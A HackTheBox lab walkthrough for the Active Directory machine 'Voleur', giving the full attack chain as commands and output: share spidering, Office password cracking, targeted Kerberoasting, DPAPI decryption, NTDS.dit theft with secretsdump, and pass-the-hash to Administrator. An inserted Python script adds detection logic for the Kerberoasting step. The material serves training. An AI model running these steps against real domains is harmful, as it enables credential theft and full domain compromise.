Machine: Windows | HackTheBox | 3/5

HackTheBox: Voleur

2026-06-08
Tracks CPTS

Introduction

Voleur is a Windows Active Directory machine built around an assumed breach scenario - you’re handed low-privileged credentials right from the start. NTLM is disabled, so everything goes through Kerberos. The path to root:

  1. Kerberos setup → configure your attacker machine to talk to the domain
  2. SMB enumeration → find a password-protected Excel file on the IT share
  3. Crack the Excel password → open the spreadsheet, discover service account credentials
  4. Targeted Kerberoasting → exploit WriteSPN rights to get a crackable hash for svc_winrm
  5. Foothold → WinRM shell as svc_winrm (user flag here)
  6. Lateral movement → restore a deleted AD user, decrypt a DPAPI credential blob, pivot to jeremy.combs
  7. Privilege escalation → SSH into a WSL Linux subsystem as svc_backup, grab NTDS backups, dump all hashes
  8. Root → Pass-the-Hash with the Administrator NT hash → full domain compromise

Key Concepts

What is an assumed breach? In real engagements, attackers sometimes already have a foothold (e.g. via phishing). This machine simulates that - you start with valid low-priv credentials instead of having to break in from scratch.

What is NTLM vs Kerberos? Windows networks support two authentication protocols. NTLM is the older, simpler one. Kerberos is the modern standard used in Active Directory. On this box NTLM is completely disabled, so every tool needs the -k flag to use Kerberos instead.

What is Kerberoasting? Service accounts in AD often have a ServicePrincipalName (SPN) attribute. Any authenticated user can request a Kerberos ticket for that service (a TGS), and that ticket is encrypted with the service account’s password hash. You can take that ticket offline and crack it with a wordlist - no interaction with the DC needed after the initial request.

What is WriteSPN? This is an AD permission that lets you add or modify the ServicePrincipalName attribute of another account. If an account doesn’t have an SPN, it can’t be Kerberoasted. But if you have WriteSPN over it, you can add one - turning a non-Kerberoastable account into one you can attack. This is called Targeted Kerberoasting.

What is DPAPI? The Data Protection API is a Windows feature that encrypts secrets (passwords, keys, etc.) using the current user’s login password. It stores two things: a master key (locked by the user’s password) and a credential blob (locked by the master key). If you have the user’s password and SID, you can decrypt both and recover whatever was stored inside.

What is NTDS.dit? This is the Active Directory database file - it stores every user account, group, and password hash in the domain. Getting your hands on it (and the SYSTEM hive to decrypt it) is effectively full domain compromise, since you can extract the Administrator hash and log in as them.

What is WSL? Windows Subsystem for Linux lets you run a real Linux environment inside Windows. On this box, the admins set up a Linux subsystem for backup purposes - and left an SSH key that lets us log into it. Once inside, we can access Windows files through /mnt/c/, including the AD backup files.


Enumeration

Nmap: fast two-pass scan

ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV <TARGET>

Key open ports:

Port         Service         Notes
53           DNS             Confirms this is a Domain Controller
88           Kerberos        AD authentication
389 / 3268   LDAP            AD directory queries
445          SMB             File shares
2222         SSH (Ubuntu)    Linux subsystem - unusual!
5985         WinRM           Remote PowerShell

The domain name from the Nmap output is voleur.htb. Port 2222 running Ubuntu is a big clue - there’s a Linux subsystem hidden on this Windows box.

Configure Kerberos (required: NTLM is disabled)

First, add the domain to your hosts file:

echo "<TARGET> DC.voleur.htb voleur.htb DC" | sudo tee -a /etc/hosts

Generate a Kerberos config file with netexec (--generate-krb5-file), or write the equivalent config by hand, and install it as /etc/krb5.conf:

netexec smb DC.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -d voleur.htb -k --generate-krb5-file voleur.krb5
echo '[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VOLEUR.HTB
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB' | sudo tee /etc/krb5.conf

Sync your clock to the DC - Kerberos breaks if your time is off by more than 5 minutes:

sudo ntpdate <TARGET>

Why sync the clock? Kerberos uses timestamps as part of its security model. If your clock drifts too far from the DC’s, authentication will fail with a “clock skew” error.


Foothold: Password-Protected Excel on SMB

List shares with Kerberos auth

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

ryan.naylor has READ access to the IT share. Spider it for files:

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --shares --spider IT --regex .

Found: //DC.voleur.htb/IT/First-Line Support/Access_Review.xlsx

Download the file

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --share IT \
  --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx

Opening it shows a password prompt. Time to crack it.

Crack the Excel password

office2john Access_Review.xlsx > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

Password: football1

What is office2john? Microsoft Office files can be password-protected with an encryption scheme that wraps the document. office2john pulls out the cryptographic portion and formats it as a hash that John the Ripper can attempt to crack offline.

Read the spreadsheet

Open Access_Review.xlsx with password football1. It contains users, job titles, permissions, and notes including plaintext passwords for several service accounts. Key findings:

  • svc_ldap : M1XyC9pW7qT5Vn
  • svc_iis : N5pXyW1VqM7CZ8
  • todd.wolfe : NightT1meP1dg3on14 (account deleted - interesting)
  • Note about svc_backup says to speak to Jeremy

Verify credentials:

nxc smb DC.voleur.htb -u user.txt -p pass.txt -k --continue-on-success

svc_ldap and svc_iis both authenticate successfully.


Targeted Kerberoasting → Shell as svc_winrm

Collect AD data with BloodHound

bloodhound-python -u 'ryan.naylor' -d 'voleur.htb' -p 'HollowOct31Nyt' -c all --zip -ns <TARGET> --dns-tcp

Upload the zip to BloodHound. The graph reveals:

SVC_LDAP has WriteSPN over SVC_WINRM

This means we can add an SPN to svc_winrm, making it Kerberoastable.

Get a TGT for svc_ldap

impacket-getTGT voleur.htb/svc_ldap -dc-ip <TARGET>
# enter password: M1XyC9pW7qT5Vn
export KRB5CCNAME=svc_ldap.ccache

What is a TGT? A Ticket Granting Ticket is your “login token” in Kerberos. Once you have one, you can request service tickets (TGS) for anything on the domain without re-entering your password. The KRB5CCNAME environment variable tells tools where to find your cached ticket.

Run the Targeted Kerberoast attack

python3 targetedKerberoast.py -d voleur.htb --dc-host DC -u svc_ldap@voleur.htb -k

This automatically adds an SPN to svc_winrm, requests a TGS, and prints the crackable hash.
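As an added defender-side example (not from the original writeup), the Python below correlates constructed Windows Security event records to spot the WriteSPN-then-Kerberoast sequence described above: a servicePrincipalName write (Event 5136) followed by an RC4 TGS request (Event 4769, etype 0x17) for that account, and the SPN being removed again shortly after. The event IDs are real; the simplified field names and the sample records are assumptions.

```python
# Added example, not part of the original writeup. Detection logic for the
# targeted Kerberoast pattern: Event 5136 (servicePrincipalName added to an
# account, which requires WriteSPN) followed within a short window by Event
# 4769 (TGS request) for that account with RC4 (etype 0x17), then the SPN
# being deleted again. Field names are simplified assumptions, not the exact
# Security log XML schema.
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, fields)
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", 5136, {"subject": "svc_ldap", "object": "svc_winrm",
                                   "attribute": "servicePrincipalName", "operation": "added"}),
    ("2024-01-01T10:00:05", 4769, {"account": "svc_ldap", "service": "svc_winrm", "etype": "0x17"}),
    ("2024-01-01T10:00:30", 5136, {"subject": "svc_ldap", "object": "svc_winrm",
                                   "attribute": "servicePrincipalName", "operation": "deleted"}),
    # Benign: an AES (0x12) ticket request for the DC's own account
    ("2024-01-01T11:00:00", 4769, {"account": "ryan.naylor", "service": "DC$", "etype": "0x12"}),
]

RC4_ETYPE = "0x17"  # RC4-HMAC: the etype an attacker asks for to get a crackable TGS


def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Return alerts for SPN writes followed by RC4 TGS requests or quick SPN removal."""
    spn_added = {}  # object -> (time, subject) of the most recent SPN add
    alerts = []
    for ts, event_id, f in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        if event_id == 5136 and f.get("attribute") == "servicePrincipalName":
            if f["operation"] == "added":
                spn_added[f["object"]] = (t, f["subject"])
            elif f["operation"] == "deleted" and f["object"] in spn_added:
                t0, who = spn_added[f["object"]]
                if t - t0 <= window:  # SPN lived only briefly: typical of tooling
                    alerts.append({"type": "transient_spn", "target": f["object"], "actor": who})
        elif event_id == 4769 and f.get("etype") == RC4_ETYPE:
            hit = spn_added.get(f["service"])
            if hit and t - hit[0] <= window:
                alerts.append({"type": "rc4_tgs_after_spn_write",
                               "target": f["service"], "actor": f["account"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

On a real domain the same correlation can be fed from a SIEM query over 5136 and 4769; a legitimate SPN change rarely comes paired with an RC4 ticket request minutes later.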

Crack the hash

hashcat hash /usr/share/wordlists/rockyou.txt

svc_winrm password: AFireInsidedeOzarctica980219afi

Get a shell

impacket-getTGT voleur.htb/svc_winrm -dc-ip <TARGET>
# enter password: AFireInsidedeOzarctica980219afi
export KRB5CCNAME=svc_winrm.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

User flag captured. C:\Users\svc_winrm\Desktop\user.txt


Lateral Movement: Restore Deleted User + DPAPI

Restore deleted AD user (todd.wolfe)

The svc_ldap account is in a group called Restore Users. Use RunasCs.exe (upload it first via Evil-WinRM) to run commands as svc_ldap:

# Upload RunasCs first
upload RunasCs.exe

# Find deleted objects
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADObject -Filter 'isDeleted -eq `$true' -IncludeDeletedObjects -Properties distinguishedName,objectSid -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb'"

Output shows Todd Wolfe with GUID 1c6b1deb-c372-4cbb-87b1-15031de169db. Restore it:

./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Restore-ADObject 'CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb'"

What is the AD Recycle Bin? When a user is deleted in Active Directory, it’s not immediately wiped - it’s moved to a hidden “Deleted Objects” container and kept for a recovery period. The Restore-ADObject cmdlet brings it back with all its original attributes intact.

Access todd.wolfe’s archived profile on SMB

Get a TGT for Todd using the spreadsheet password:

impacket-getTGT voleur.htb/todd.wolfe -dc-ip <TARGET>
# password: NightT1meP1dg3on14
export KRB5CCNAME=todd.wolfe.ccache

Spider the IT share - there’s an archived profile at IT/Second-Line Support/Archived Users/todd.wolfe/. Connect and browse:

impacket-smbclient -k todd.wolfe@dc.voleur.htb

Navigate to AppData\Roaming\Microsoft and download two things:

# Credential blob:
Credentials/772275FAD58525253490A9B0039791D3

# Master key:
Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
get 08949382-134f-4c63-b93c-ce52efc0aa88
get 772275FAD58525253490A9B0039791D3

Decrypt the DPAPI credential

Step 1 - decrypt the master key using Todd’s SID and password:

impacket-dpapi masterkey \
  -file 08949382-134f-4c63-b93c-ce52efc0aa88 \
  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 \
  -password NightT1meP1dg3on14

Copy the decrypted key from the output (the long 0x... hex string).

Step 2 - decrypt the credential blob:

impacket-dpapi credential \
  -file 772275FAD58525253490A9B0039791D3 \
  -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Result:

Username : jeremy.combs
Password : qT3V9pLXyN7W4m

Get a shell as jeremy.combs

impacket-getTGT voleur.htb/jeremy.combs -dc-ip <TARGET>
# password: qT3V9pLXyN7W4m
export KRB5CCNAME=jeremy.combs.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Privilege Escalation: WSL + NTDS Backup → Administrator

Find the SSH key

As jeremy.combs, navigate to C:\IT\Third-Line Support:

*Evil-WinRM* PS C:\IT\Third-Line Support> dir
id_rsa       ← SSH private key
Note.txt.txt ← a note from Admin

Read the note - it mentions WSL being set up for backup purposes and an SSH key for svc_backup. Our Nmap scan already showed SSH on port 2222. Let’s use it:

download id_rsa

SSH into the WSL Linux subsystem

chmod 600 id_rsa
ssh -i id_rsa svc_backup@<TARGET> -p 2222
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
svc_backup@DC:~$

Why does this work? WSL gives Linux a full view of the Windows filesystem under /mnt/c/. The svc_backup account was set up to run Linux backup tools - which means it has read access to backup files stored on the Windows side.

Grab the NTDS backup files

Browse to the backup folder:

cd "/mnt/c/IT/Third-Line Support/Backups"
ls
# Active Directory/   registry/

Download all three files using SCP (run these from your attack machine):

scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

What are SYSTEM and SECURITY? The password hashes inside NTDS.dit are encrypted with a key that is itself protected by the boot key, which lives in the SYSTEM registry hive. The SECURITY hive holds LSA secrets and cached domain credentials. Together, these three files let you extract every hash offline.

Dump all hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL

The Administrator hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Root: Pass-the-Hash as Administrator

Even though NTLM is disabled for SMB, the NT hash is also the RC4-HMAC Kerberos key, so we can still use it to request a Kerberos TGT via Impacket (overpass-the-hash):

impacket-getTGT voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
export KRB5CCNAME=administrator.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Root flag captured. C:\Users\Administrator\Desktop\root.txt


Summary

nmap → voleur.htb, port 2222 (WSL SSH hint)

Kerberos setup → /etc/hosts, /etc/krb5.conf, ntpdate

nxc -k --shares → IT share (READ)

Access_Review.xlsx → office2john + john → password: football1

Spreadsheet contents → svc_ldap:M1XyC9pW7qT5Vn, svc_iis:N5pXyW1VqM7CZ8

BloodHound → svc_ldap has WriteSPN over svc_winrm

impacket-getTGT (svc_ldap) → targetedKerberoast → TGS hash

hashcat → svc_winrm:AFireInsidedeOzarctica980219afi

evil-winrm (Kerberos) → shell as svc_winrm → USER FLAG

svc_ldap in "Restore Users" group → RunasCs → Restore-ADObject (todd.wolfe)

impacket-smbclient (todd.wolfe) → Archived profile → DPAPI files

impacket-dpapi masterkey + credential → jeremy.combs:qT3V9pLXyN7W4m

evil-winrm (jeremy.combs) → C:\IT\Third-Line Support → id_rsa

ssh -i id_rsa svc_backup@... -p 2222 → WSL Ubuntu shell

/mnt/c/IT/.../Backups → ntds.dit + SYSTEM + SECURITY

impacket-secretsdump LOCAL → Administrator NT hash

impacket-getTGT -hashes → evil-winrm → ROOT FLAG

Tools Used

Tool                   What it does                                                          How to get it
netexec (nxc)          Swiss-army knife for SMB/WinRM enumeration with Kerberos support      pip install netexec
bloodhound-python      Collects AD data (users, groups, ACLs) for BloodHound analysis        pip install bloodhound
BloodHound             Visualises AD attack paths as a graph                                 github.com/BloodHoundAD/BloodHound
office2john            Extracts crackable hash from password-protected Office files          Built into Kali (john suite)
john                   Password cracker                                                      sudo apt install john
targetedKerberoast     Adds a temporary SPN, requests a TGS, then removes it                 github.com/ShutdownRepo/targetedKerberoast
hashcat                GPU-accelerated password cracker (faster than john for hashes)        sudo apt install hashcat
impacket-getTGT        Requests a Kerberos TGT (supports hash-based auth)                    pip install impacket
impacket-smbclient     Interactive SMB shell with Kerberos support                           pip install impacket
impacket-dpapi         Decrypts DPAPI master keys and credential blobs                       pip install impacket
impacket-secretsdump   Dumps hashes from NTDS.dit + registry hives offline                   pip install impacket
evil-winrm             WinRM shell with Kerberos authentication                              gem install evil-winrm
RunasCs.exe            Run commands as another user (like runas but with network logon)      github.com/antonioCoco/RunasCs